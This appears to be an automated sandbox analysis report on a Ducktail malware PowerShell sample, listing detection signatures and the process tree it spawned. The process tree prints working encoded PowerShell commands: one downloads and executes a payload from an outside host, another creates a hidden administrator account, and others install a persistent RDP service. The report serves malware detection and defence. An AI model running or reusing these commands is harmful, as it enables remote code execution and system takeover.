Edit tour

Windows Analysis Report
kingsmaker_4.ca.ps1

Overview

General Information

Sample name:	kingsmaker_4.ca.ps1
Analysis ID:	1565059
MD5:	26b9748c7c6e3aeaed7a96eb26cb8277
SHA1:	d3a67c19c99e205a552cbb875a7465591e938326
SHA256:	85794de1be32ab105557d079db6f6b1b1b1f67bc37e887e9cdafa9d817dbb59e
Infos:

Detection

Ducktail

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Ducktail

Allows multiple concurrent remote connection

Bypasses PowerShell execution policy

Encrypted powershell cmdline option found

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Modifies security policies related information

Potential dropper URLs found in powershell memory

Powershell drops PE file

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Reads the Security eventlog

Reads the System eventlog

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Sigma detected: PowerShell Base64 Encoded WMI Classes

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious New Service Creation

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Uses known network protocols on non-standard ports

Uses regedit.exe to modify the Windows registry

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file contains strange resources

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64native

powershell.exe (PID: 8976 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

csc.exe (PID: 9184 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 9204 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4364.tmp" "c:\Users\user\AppData\Local\Temp\qlxhihga\CSCB3BD9BA87EAD4F1291288FCEAEB15417.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

powershell.exe (PID: 6368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

AcroRd32.exe (PID: 3628 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\Job Description.pdf" MD5: 6791EAE6124B58F201B32F1F6C3EC1B0)

cmd.exe (PID: 8032 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7088 cmdline: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

svczHost.exe (PID: 3468 cmdline: C:\Windows\Temp\svczHost.exe cakoi7 kingsmaker.ca MD5: EB57894A8FF610DF55C97E427D0DDD7B)

conhost.exe (PID: 2984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 7240 cmdline: "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7032 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 2196 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

powershell.exe (PID: 6500 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 4932 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6192 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 7556 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 2676 cmdline: "cmd.exe" /c sc stop "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 2388 cmdline: sc stop "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 7920 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 7480 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 5052 cmdline: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 8200 cmdline: sc delete "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8252 cmdline: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

net.exe (PID: 8308 cmdline: net start "myRdpService" MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 8336 cmdline: C:\Windows\system32\net1 start "myRdpService" MD5: BA0BCCC6029FBBE6D8B41197F252742F)

powershell.exe (PID: 5464 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

